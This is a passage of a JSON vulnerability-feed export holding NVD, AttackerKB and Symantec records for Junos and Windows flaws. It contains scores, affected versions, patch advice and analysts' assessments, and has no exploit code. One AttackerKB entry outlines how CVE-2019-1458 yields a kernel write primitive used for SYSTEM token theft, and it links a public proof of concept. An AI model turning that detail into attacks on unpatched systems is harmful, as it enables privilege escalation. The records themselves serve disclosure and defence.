["cpe:/o:juniper:junos:18.4", "cpe:/o:juniper:junos:19.3", "cpe:/o:juniper:junos:18.3", "cpe:/o:juniper:junos:17.3", "cpe:/o:juniper:junos:19.1", "cpe:/o:juniper:junos:19.2"], "id": "CVE-2020-1660", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-1660", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:juniper:junos:19.1:-:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:17.3:r3-s7:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:17.3:r2-s4:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.3:r2-s1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:17.3:r2-s1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.2:r1-s1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.3:r1-s1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.2:r1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.4:r1-s2:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.4:r2-s3:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.3:r2-s1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:17.3:r2-s5:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.1:r1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:17.3:r2-s3:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.3:r1-s3:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.4:r2-s1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:17.3:r2-s2:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.4:r1-s6:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:17.3:r3-s3:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.3:r1-s6:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:17.3:r3-s1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.3:r2:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.3:r1-s2:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.3:r2-s2:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.1:r1-s1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.3:r1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.4:r2:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:17.3:r2:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:17.3:r3-s2:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:17.3:r3:-:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.3:-:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.3:-:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:17.3:r1-s1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.3:r1-s5:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.1:r1-s4:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.2:r1-s3:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.3:r2:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.4:r2-s2:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:17.3:-:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.3:r1-s1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.4:r1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.1:r1-s2:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.1:r2-s1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.4:r2-s4:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.3:r1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.2:-:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.2:r1-s2:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.4:r1-s1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.4:r1-s5:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.4:-:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.3:r2-s3:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.1:r1-s3:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.3:r3:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:17.3:r3-s4:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.1:r2:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.3:r2-s2:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T07:12:51", "description": "An information disclosure vulnerability exists when the Windows Remote Procedure Call (RPC) runtime improperly initializes objects in memory, aka 'Windows Remote Procedure Call Information Disclosure Vulnerability'.", "edition": 6, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2019-11-12T19:15:00", "title": "CVE-2019-1409", "type": "cve", "cwe": ["CWE-665"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1409"], "modified": "2020-08-24T17:37:00", "cpe": ["cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_server_2016:1803", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_10:1709", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_server_2016:1903"], "id": "CVE-2019-1409", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-1409", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:itanium:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T07:12:52", "description": "An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'.", "edition": 8, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-12-10T22:15:00", "title": "CVE-2019-1458", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1458"], "modified": "2020-10-15T21:15:00", "cpe": ["cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_7:-"], "id": "CVE-2019-1458", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-1458", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:itanium:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:itanium:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"]}], "attackerkb": [{"lastseen": "2021-02-04T21:15:31", "bulletinFamily": "info", "cvelist": ["CVE-2021-1647"], "description": "CVE-2021-1647 is a zero-day remote code execution vulnerability in the Malware Protection Engine component (mpengine.dll) of Microsoft\u2019s Defender anti-virus product. It was published as part of the January 2021 Patch Tuesday release, along with a disclosure from Microsoft acknowledging that the vulnerability had been exploited in the wild. More information: <https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1647>\n\n \n**Recent assessments:** \n \n**cdelafuente-r7** at January 13, 2021 3:55pm UTC reported:\n\nNo useful information has been published so far and most of the speculations found online are based on the [CVSS 3.0](<https://www.first.org/cvss/v3-0/>) metrics found in the [advisory](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1647>). That said, the attack vector seems to be [Local](<https://www.first.org/cvss/v3.0/specification-document#2-1-1-Attack-Vector-AV>) but can be exploited remotely, which means that some kind of malicious file needs to be placed locally to be scanned by Windows Defender and trigger the vulnerability. After talking about this with **@smcintyre-r7** and **@bwatters-r7**, we can imagine that `Remote` means this file needs to be sent remotely somehow, for example, using a file upload in a website or an email attachment via Exchange.\n\nSome considerations to keep in mind: Windows defender vulnerabilities get patched immediately and automatically, without user interactions. So, the exploitation window is very short. Finally, even if the exploitation succeeds, the evasion will be problematic, since the anti-virus will probably detect the attack.\n\nAssessed Attacker Value: 2 \nAssessed Attacker Value: 1**gwillcox-r7** at February 04, 2021 7:15pm UTC reported:\n\nNo useful information has been published so far and most of the speculations found online are based on the [CVSS 3.0](<https://www.first.org/cvss/v3-0/>) metrics found in the [advisory](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1647>). That said, the attack vector seems to be [Local](<https://www.first.org/cvss/v3.0/specification-document#2-1-1-Attack-Vector-AV>) but can be exploited remotely, which means that some kind of malicious file needs to be placed locally to be scanned by Windows Defender and trigger the vulnerability. After talking about this with **@smcintyre-r7** and **@bwatters-r7**, we can imagine that `Remote` means this file needs to be sent remotely somehow, for example, using a file upload in a website or an email attachment via Exchange.\n\nSome considerations to keep in mind: Windows defender vulnerabilities get patched immediately and automatically, without user interactions. So, the exploitation window is very short. Finally, even if the exploitation succeeds, the evasion will be problematic, since the anti-virus will probably detect the attack.\n", "modified": "2021-01-16T00:00:00", "published": "2021-01-12T00:00:00", "id": "AKB:06000FAE-591B-46C7-8573-3D63BDDD0D13", "href": "https://attackerkb.com/topics/DzXZpEuBeP/cve-2021-1647-microsoft-windows-defender-zero-day-vulnerability", "type": "attackerkb", "title": "CVE-2021-1647 Microsoft Windows Defender Zero-Day Vulnerability", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-18T06:36:55", "bulletinFamily": "info", "cvelist": ["CVE-2019-13720", "CVE-2019-1458"], "description": "An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka \u2018Win32k Elevation of Privilege Vulnerability\u2019.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at October 19, 2020 5:31pm UTC reported:\n\nKnown as WizardOpium for its use in the WizardOpium attacks, and first written about by Kaspersky Labs. The writeup by Kaspersky Labs can be found at <https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/> which shows that this vulnerability was used in conjunction with CVE-2019-13720, which was a 0day in the Chrome browser at the time that occurred due to a race condition between two threads.\n\nIn the WizardOpium attacks, the Chrome vulnerability, aka CVE-2019-13720, was first used to gain an arbitrary read/write primitive in the Chrome render process that lead to arbitrary code execution as the Chrome render (read more on this at <https://bugs.chromium.org/p/chromium/issues/detail?id=888923> if your interested). However this still left attackers with a problem: they needed some way to escape the Chrome render\u2019s sandbox if they wanted to get persistent access to the target.\n\nThis is where CVE-2019-1458 came in. Looking at the advisory at <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1458> we can see this vulnerability affected quite a wide range of targets, going all the way from Windows 7 up to Windows 10 v1607. Later versions of Windows 10 are not affected, however.\n\nIf one dives around the internet a little bit more though they will stumble across <https://googleprojectzero.blogspot.com/p/rca-cve-2019-1458.html> which was written by the Project Zero team at Google which explains the vulnerability quite well. In essence there is a Uninitialized Variable error in Windows within its Windows Switching code whereby the field `*(gpsi + 0x154)` in the global structure `tagSERVERINFO`, which describes system windows (such as menus, desktops, switch windows, etc), which was not properly initialized at the start of a function, which allowed user mode code to set extra window data in a task switch window of Window class `FNID_SWITCH`, or `0x280`, which can normally only be set by the kernel. Even worse though is the fact that this extra window data is essentially a pointer which is then dereferenced and then written to, which grants the attacker a limited arbitrary write primitive in kernel mode, which then can then use to perform limited controlled writes to kernel memory and take over the system. Attackers then used this limited kernel write primitive to overwrite their current process\u2019s access token value with the value of the SYSTEM process\u2019s access token value, thereby allowing them to execute code as SYSTEM.\n\nIf one then looks at <https://github.com/piotrflorczyk/cve-2019-1458_POC>, which does a deep technical dive into all of the details of this vulnerability, one can see that the affected function was `InitFunctionTables()` within `win32k.sys`, which didn\u2019t appropriately initialize the fields `*(gpsi+0x14E)`, `*(gpsi+0x154)`, and `*(gpsi+0x180)`, despite initializing other fields within the same structure. Microsoft\u2019s patch ensured that these fields were all set up and initialized with appropriate values at the start of the `InitFunctionTables()` call, thus preventing this issue from occurring.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 3\n", "modified": "2020-07-24T00:00:00", "published": "2019-12-10T00:00:00", "id": "AKB:C5336A4C-EEE0-4EA3-AD28-85F0EF3F0F75", "href": "https://attackerkb.com/topics/2i67dR7P4e/cve-2019-1458", "type": "attackerkb", "title": "CVE-2019-1458", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-22T06:10:03", "bulletinFamily": "info", "cvelist": ["CVE-2019-13720", "CVE-2019-1458"], "description": "Multiple vulnerabilities have been discovered in Google Chrome, the most severe of which could allow for arbitrary code execution. Google Chrome is a web browser used to access the Internet. Successful exploitation of the most severe vulnerabilities could allow an attacker to execute arbitrary code in the context of the browser. Depending on the privileges associated with the application, an attacker could install programs; view, change, or delete data; or create new accounts with full user rights. If this application has been configured to have fewer user rights on the system, exploitation of the most severe of these vulnerabilities could have less impact than if it was configured with administrative rights.\n\nUse after free in WebAudio in Google Chrome prior to 78.0.3904.87 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n\n \n**Recent assessments:** \n \n**busterb** at November 01, 2019 6:45pm UTC reported:\n\nBased on the technical analysis by Kaspersky, this is a very effective exploit, and is able to leverage an info leak, heap grooming, and the malware deployed via watering-hole injection on a Korean-language news portal, establishes persistence via a dropped file on disk.\n\nAn attacker does need to leverage a few items in advance for this and any client-side attack, that is a watering hole injection or some other delivery method. Chrome\u2019s quick patching mechanism means these vulns _typically_ have a short shelf life, though the inability to force users to actually update is a limiting factor.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 2**space-r7** at November 01, 2019 7:32pm UTC reported:\n\nBased on the technical analysis by Kaspersky, this is a very effective exploit, and is able to leverage an info leak, heap grooming, and the malware deployed via watering-hole injection on a Korean-language news portal, establishes persistence via a dropped file on disk.\n\nAn attacker does need to leverage a few items in advance for this and any client-side attack, that is a watering hole injection or some other delivery method. Chrome\u2019s quick patching mechanism means these vulns _typically_ have a short shelf life, though the inability to force users to actually update is a limiting factor.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 2**gwillcox-r7** at November 22, 2020 2:51am UTC reported:\n\nBased on the technical analysis by Kaspersky, this is a very effective exploit, and is able to leverage an info leak, heap grooming, and the malware deployed via watering-hole injection on a Korean-language news portal, establishes persistence via a dropped file on disk.\n\nAn attacker does need to leverage a few items in advance for this and any client-side attack, that is a watering hole injection or some other delivery method. Chrome\u2019s quick patching mechanism means these vulns _typically_ have a short shelf life, though the inability to force users to actually update is a limiting factor.\n", "modified": "2020-10-13T00:00:00", "published": "2019-10-10T00:00:00", "id": "AKB:3609E46B-E023-474D-B14A-026E01AF8EA9", "href": "https://attackerkb.com/topics/EfbjmUx1X2/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium", "type": "attackerkb", "title": "Chrome 0-day exploit CVE-2019-13720 used in Operation WizardOpium", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-14T21:07:38", "bulletinFamily": "info", "cvelist": ["CVE-2020-0986", "CVE-2020-1237", "CVE-2020-1246", "CVE-2020-1262", "CVE-2020-1264", "CVE-2020-1266", "CVE-2020-1269", "CVE-2020-1273", "CVE-2020-1274", "CVE-2020-1275", "CVE-2020-1276", "CVE-2020-1307", "CVE-2020-1316", "CVE-2020-17008", "CVE-2021-1648"], "description": "An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka \u2018Windows Kernel Elevation of Privilege Vulnerability\u2019. This CVE ID is unique from CVE-2020-1237, CVE-2020-1246, CVE-2020-1262, CVE-2020-1264, CVE-2020-1266, CVE-2020-1269, CVE-2020-1273, CVE-2020-1274, CVE-2020-1275, CVE-2020-1276, CVE-2020-1307, CVE-2020-1316.\n\n \n**Recent assessments:** \n \n**ccondon-r7** at December 28, 2020 5:15pm UTC reported:\n\nGoogle Project Zero researcher Maddie Stone, who originally [disclosed this vulnerability](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2096>) to Microsoft, [reported on December 23, 2020](<https://twitter.com/maddiestone/status/1341781305126612995>) that the patch is incomplete and can be bypassed.\n\nQuoting her [post here](<https://twitter.com/maddiestone/status/1341781306766573568>): \u201cThe original issue was an arbitrary pointer dereference which allowed the attacker to control the src and dest pointers to a memcpy. The \u201cfix\u201d simply changed the pointers to offsets, which still allows control of the args to the memcpy.\u201d\n\nStealing directly from a conversation with Metasploit\u2019s Windows exploit expert **@zeroSteiner**, it sounds like this bug isn\u2019t terribly useful as an LPE \u201cbecause the slpwow64 process doesn\u2019t run with elevated privileges\u2014just an elevated integrity, which Microsoft doesn\u2019t consider a security boundary anymore anyway.\u201d Project Zero-reported vulns tend to draw media and researcher attention and there\u2019s quite a lot of detail publicly available between Stone\u2019s original report and this in-depth [Kaspersky write-up](<https://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/>), so we may see more exploitation even if the impact of the bug by itself isn\u2019t terribly high. That said, the Kaspersky analysis is definitely worth a read if you want to understand this CVE\u2019s utility for the IE 11 use case!\n\nAssessed Attacker Value: 2 \nAssessed Attacker Value: 4**gwillcox-r7** at November 22, 2020 2:32am UTC reported:\n\nGoogle Project Zero researcher Maddie Stone, who originally [disclosed this vulnerability](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2096>) to Microsoft, [reported on December 23, 2020](<https://twitter.com/maddiestone/status/1341781305126612995>) that the patch is incomplete and can be bypassed.\n\nQuoting her [post here](<https://twitter.com/maddiestone/status/1341781306766573568>): \u201cThe original issue was an arbitrary pointer dereference which allowed the attacker to control the src and dest pointers to a memcpy. The \u201cfix\u201d simply changed the pointers to offsets, which still allows control of the args to the memcpy.\u201d\n\nStealing directly from a conversation with Metasploit\u2019s Windows exploit expert **@zeroSteiner**, it sounds like this bug isn\u2019t terribly useful as an LPE \u201cbecause the slpwow64 process doesn\u2019t run with elevated privileges\u2014just an elevated integrity, which Microsoft doesn\u2019t consider a security boundary anymore anyway.\u201d Project Zero-reported vulns tend to draw media and researcher attention and there\u2019s quite a lot of detail publicly available between Stone\u2019s original report and this in-depth [Kaspersky write-up](<https://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/>), so we may see more exploitation even if the impact of the bug by itself isn\u2019t terribly high. That said, the Kaspersky analysis is definitely worth a read if you want to understand this CVE\u2019s utility for the IE 11 use case!\n", "modified": "2020-07-24T00:00:00", "published": "2020-06-09T00:00:00", "id": "AKB:0E829C08-804A-436D-A730-1B474A82E4A7", "href": "https://attackerkb.com/topics/bQeeJLG1aP/cve-2020-0986", "type": "attackerkb", "title": "CVE-2020-0986", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "symantec": [{"lastseen": "2018-12-12T01:10:26", "bulletinFamily": "software", "cvelist": ["CVE-2018-8514"], "description": "### Description\n\nMicrosoft Windows is prone to a local information-disclosure vulnerability. A local attacker can leverage this issue to disclose sensitive information that may aid in further attacks.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 Version 1709 for ARM64-based Systems \n * Microsoft Windows 10 Version 1803 for 32-bit Systems \n * Microsoft Windows 10 Version 1803 for ARM64-based Systems \n * Microsoft Windows 10 Version 1803 for x64-based Systems \n * Microsoft Windows 10 Version 1809 for 32-bit Systems \n * Microsoft Windows 10 Version 1809 for ARM64-based Systems \n * Microsoft Windows 10 Version 1809 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1703 for 32-bit Systems \n * Microsoft Windows 10 version 1703 for x64-based Systems \n * Microsoft Windows 10 version 1709 for 32-bit Systems \n * Microsoft Windows 10 version 1709 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 1709 \n * Microsoft Windows Server 1803 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 \n * Microsoft Windows Server 2019 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nEnsure that only trusted users have local, interactive access to affected computers.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2018-12-11T00:00:00", "published": "2018-12-11T00:00:00", "id": "SMNTC-106079", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/106079", "type": "symantec", "title": "Microsoft Windows CVE-2018-8514 Local Information Disclosure Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-11T16:20:57", "bulletinFamily": "software", "cvelist": ["CVE-2019-1458"], "description": "### Description\n\nMicrosoft Windows is prone to a local privilege-escalation vulnerability. A local attacker can exploit this issue to execute arbitrary code in kernel mode with elevated privileges.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nEnsure that only trusted users have local, interactive access to affected computers.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2019-12-10T00:00:00", "published": "2019-12-10T00:00:00", "id": "SMNTC-111060", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/111060", "type": "symantec", "title": "Microsoft Windows Win32k CVE-2019-1458 Local Privilege Escalation Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-11-13T21:21:46", "bulletinFamily": "software", "cvelist": ["CVE-2019-1409"], "description": "### Description\n\nMicrosoft Windows is prone to a local information-disclosure vulnerability. A local attacker can leverage this issue to disclose sensitive information that may aid in further attacks.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 Version 1709 for ARM64-based Systems \n * Microsoft Windows 10 Version 1803 for 32-bit Systems \n * Microsoft Windows 10 Version 1803 for ARM64-based Systems \n * Microsoft Windows 10 Version 1803 for x64-based Systems \n * Microsoft Windows 10 Version 1809 for 32-bit Systems \n * Microsoft Windows 10 Version 1809 for ARM64-based Systems \n * Microsoft Windows 10 Version 1809 for x64-based Systems \n * Microsoft Windows 10 Version 1903 for 32-bit Systems \n * Microsoft Windows 10 Version 1903 for ARM64-based Systems \n * Microsoft Windows 10 Version 1903 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1703 for 32-bit Systems \n * Microsoft Windows 10 version 1703 for x64-based Systems \n * Microsoft Windows 10 version 1709 for 32-bit Systems \n * Microsoft Windows 10 version 1709 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 1803 \n * Microsoft Windows Server 1903 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 \n * Microsoft Windows Server 2019 \n\n### 